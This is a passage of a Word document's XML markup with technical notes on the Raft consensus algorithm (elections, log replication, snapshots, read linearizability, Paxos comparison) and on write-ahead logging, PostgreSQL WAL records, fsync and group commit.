    <w:p w14:paraId="375E5DA3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Raft state machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3B0BA2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Every Raft node is always in one of three states:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063A2264" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Follower:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Passive. Accepts log entries from the leader. Responds to leader's heartbeats. If no heartbeat within election timeout → becomes candidate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F461650" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Candidate:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Requests votes from other nodes. If majority votes received → becomes leader. If another leader's message received → returns to follower. If election timeout without majority → restarts election with incremented term.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED2FFE9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Leader:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Active. Accepts client writes. Appends to its log. Replicates to followers. Sends heartbeats to maintain authority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB0696F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Terms — The Logical Clock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC98E5B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Time in Raft is divided into </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>terms</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — monotonically increasing integers. Each term begins with an election. At most one leader per term (or no leader if election fails). Terms serve as a logical clock — a node that receives a message with a higher term immediately updates its term and reverts to follower. Stale leaders (network-partitioned old leaders) are detected by their lower term number and rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68671A63" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Leader Election Internals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566C465E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Election timeout is randomized per node (e.g., uniformly distributed between 150ms and 300ms). The randomization prevents multiple candidates splitting votes indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D46E66" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>RequestVote RPC from candidate to voter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9C0842" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF5B793" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>candidate_term    (my current term)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439055F3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>candidate_id      (who I am)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133E1310" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>last_log_index    (index of my last log entry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6E00BD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>last_log_term     (term of my last log entry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1F27C7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Voter grants vote if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2845E452" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>candidate_term &gt;= voter's current term (candidate is at least as current as voter).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C54EE44" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Voter hasn't voted for anyone else in this term.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01455D54" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log completeness:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Candidate's log is at least as up-to-date as voter's log. Log A is more up-to-date than Log B if A's last entry has a higher term, or (same term) A has a longer log. This is the critical safety condition — prevents a candidate with a stale log from winning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1A22F3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why log completeness guarantees safety:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Any committed log entry was written to a quorum of nodes. A new leader must have been voted in by a quorum. These two quorums overlap. At least one voter had the committed entry and would only vote for a candidate with a log at least as complete. Therefore, the new leader is guaranteed to have all committed entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBBB066" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log Replication Internals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B227B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Client write → leader appends to its log as a new log entry → leader sends AppendEntries RPCs to all followers in parallel → waits for majority acknowledgment → </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>commits</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> the entry (applies to state machine) → responds to client → notifies followers the entry is committed (piggybacks on next AppendEntries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561691F6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>AppendEntries RPC carries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA7CEF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C7AC3F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>leader_term</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1727DB69" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>leader_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F18FB8C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>prev_log_index    (index of entry immediately preceding new entries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7710BD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>prev_log_term     (term of prev_log_index entry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC9E545" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>entries[]         (new log entries to append, empty for heartbeat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526D7443" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>leader_commit     (leader's commit index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C121345" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Follower </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rejects</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> AppendEntries if its log doesn't contain an entry at prev_log_index with term prev_log_term. This consistency check ensures follower logs are always a prefix of the leader's log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7A0B3D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>On rejection, the leader decrements nextIndex for that follower and retries with earlier entries. The leader keeps backing up until it finds the divergence point and sends all entries from there forward. This is how Raft </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>repairs inconsistent follower logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> after they miss entries (due to crashes, network partitions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210E26D0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log compaction (Snapshotting):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F3B295" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The log grows indefinitely. Periodically, nodes take a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>snapshot</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — serialize the current state machine state to disk, then discard all log entries up to the snapshotted index. The snapshot replaces those log entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E16E0BC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>When a new node joins or a crashed node restarts significantly behind, the leader sends it the snapshot rather than replaying thousands of log entries. Snapshot transfer uses the InstallSnapshot RPC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB867A3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Raft's read linearizability problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536C9BCD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A leader might be deposed (network partition) but not know it. If it serves a read from its local state, it may serve stale data (the new leader accepted writes the old leader doesn't know about). Two solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A1DB2C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Read index:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Leader confirms it's still leader by sending a heartbeat round and waiting for majority acknowledgment before serving the read. Adds one RTT to read latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4461D657" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Lease-based reads:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Leader grants itself a lease (time period during which it's guaranteed to be the leader — the election timeout). During the lease, it can serve reads without confirmation. Requires synchronized clocks (lease must expire before another leader could be elected). Used by etcd for read performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786899A6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Paxos vs Raft — The Reliability Difference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDB7189" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Paxos</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (the original consensus algorithm) has several variants (Single-decree Paxos, Multi-Paxos, Fast Paxos, Byzantine Paxos). The core is brilliant but the paper doesn't specify leader election, log management, or membership changes — leaving these critical implementation details to implementers. This ambiguity has caused countless subtly incorrect implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F74E8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The reliability implication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Raft's explicit design for understandability makes it </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>more reliably implementable</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. The TiKV (TiDB's storage engine), etcd, CockroachDB, and Consul teams all chose Raft precisely because its complete specification reduces implementation errors. An algorithm that's theoretically optimal but routinely incorrectly implemented is less reliable than an algorithm that's slightly less efficient but consistently correctly implemented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00549D7C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="230E485D">
          <v:rect id="_x0000_i2785" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="492A502D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Data Reliability — Durability, Integrity, and Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7752A12D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reliability at the data layer goes beyond keeping services running. It ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data is correct, complete, and recoverable</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> regardless of failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FE3315" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-Ahead Logging — The Core Durability Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFA90A9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Every major database uses WAL (Write-Ahead Logging)</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> as its foundational durability mechanism. The invariant is simple but profound: </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>before any change is made to a data page, a record of that change must be written to the log and flushed to durable storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008C69AE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this guarantees durability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BEFA3A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>If the system crashes at any point, on restart:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A923786" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If the WAL record is present: the change can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>redone</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — applied to the data page from the WAL record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4668D45A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>If the WAL record is absent: the change never happened (the crash occurred before the WAL write) — the data page is in its pre-change state, which is consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA75986" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The data page itself might be in any state (partially written, stale) — it doesn't matter because the WAL is the ground truth. Recovery replays WAL records to bring data pages to a consistent state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35223D27" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL WAL mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D90C1FA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each WAL record contains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E9898" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LSN (Log Sequence Number):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Byte offset in the WAL stream. Monotonically increasing. Used to order operations and track replication lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE0D3F6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Record type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Heap insert, heap update, heap delete, index insert, transaction commit, checkpoint, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42306EEA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Table/page identifier:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Which table and which 8KB page was modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571BEC3C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Before image (for updates):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The page state before the change (needed for rollback — UNDO).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6542A2D8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>After image:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The page state after the change (needed for redo — REDO).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486E2BA2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CRC:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Checksum of the WAL record. Detects corruption during recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458CC6A9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fsync problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Writing to the WAL buffer (in RAM) is fast. But RAM is volatile — a power loss loses anything not flushed to disk. fsync() flushes the OS buffer to durable storage. PostgreSQL calls fsync() on the WAL file at every transaction commit (when synchronous_commit = on). This is the operation that makes commits durable — and it's also the bottleneck for write throughput. NVMe SSDs with capacitor-backed write caches can service fsyncs in ~20µs. Spinning disks take ~8ms. The fsync latency </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>directly becomes transaction commit latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE0EF2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group commit optimization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Rather than fsyncing after every individual transaction commit, wait a brief interval (a few milliseconds) and fsync for a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>batch of transactions simultaneously</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. All transactions in the batch are committed with one fsync. This amortizes the fsync cost across many transactions — dramatically improving write throughput with only a slight increase in commit latency. PostgreSQL's synchronous_commit = remote_write and commit delay parameters control group commit behavior.</w:t>
      </w:r>
